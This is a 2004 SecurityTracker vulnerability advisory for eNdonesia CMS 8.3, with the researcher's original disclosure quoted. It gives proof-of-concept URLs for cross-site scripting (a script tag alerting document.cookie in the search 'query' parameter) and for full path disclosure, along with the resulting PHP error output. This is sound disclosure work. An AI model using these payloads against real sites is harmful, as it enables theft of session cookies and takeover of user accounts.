SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   eNdonesia Vendors:   endonesia.com
eNdonesia 'mod.php' Input Validation Vulnerability in Search 'query' Parameter Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010864
SecurityTracker URL:  http://securitytracker.com/id/1010864
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 4 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 8.3
Description:   Some vulnerabilities were reported in eNdonesia. A remote user can conduct cross-site scripting attacks. A remote user can determine the installation path.

y3dips reported reported that the software does not properly filter HTML code from user-supplied input in the "query" parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the eNdonesia portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

It is also reported that a remote user can submit a request with certain invalid parameters to cause the system to display the installation path.

Some demonstration exploit URLs are provided:

http://localhost/endon/mod.php?mod=1

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your character]

The original advisory is available at:

http://echo.or.id/adv/adv02-y3dips-2004.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the eNdonesia portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/endonesia (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in eNdonesia CMS




ECHO_ADV_02$2004

---------------------------------------------------------------------------
               Multiple vulnerabilities in eNdonesia CMS
---------------------------------------------------------------------------

Author: y3dips
Date: August, 2th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv02-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNdonesia is a freeware content management system, written in php by Nurcholis.

Homepage: http://www.endonesia.net/

download at : http://www.sourceforge.net/projects/endonesia

Version :
tested on endonesia 8.3
not tested on other/older version but it is possible be the same

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1. - all scripts in "mod.php" files are not protected against direct access

Example:

http://localhost/endon/mod.php?mod=1

... and we will see standard php error messages, revealing full path to script:

Warning: main(./mod/1/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3

Warning: main(): Failed opening './mod/1/index.php' for inclusion \
(include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3

A2. 

Example:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

... and we will see standard mysql error messages, revealing full path to script
in module because input character:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter]

warning :

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource 
in /var/www/html/endon/mod/publisher/publisher.php on line 101



B. Cross-site scripting aka XSS:

eNdonesia has built-in filtering against XSS exploits, so additional measures must be used
for successful cross-site scripting.

B1 - XSS through unsanitaized user submitted variable in mod.php

 http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1

POC : http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul

then the warning is

Warning: main(./mod/

test

Epublisher/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3 .

..... with "test" in <h1> format

B2. Session ID at search box

http://localhost/endon/mod.php?mod=publisher&op=search&query=

POC : 

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

or in search box, input &lt;script&gt;alert(document.cookie)&lt;/script&gt;

---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor not contacted yet
but i ll post it to them later

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)
~ newbie_hacker@yahoogroups.com , 
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]phreaker[dot]net
     Homepage: http://y3dips.echo.or.id/

------------------------------[ EOF ]--------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC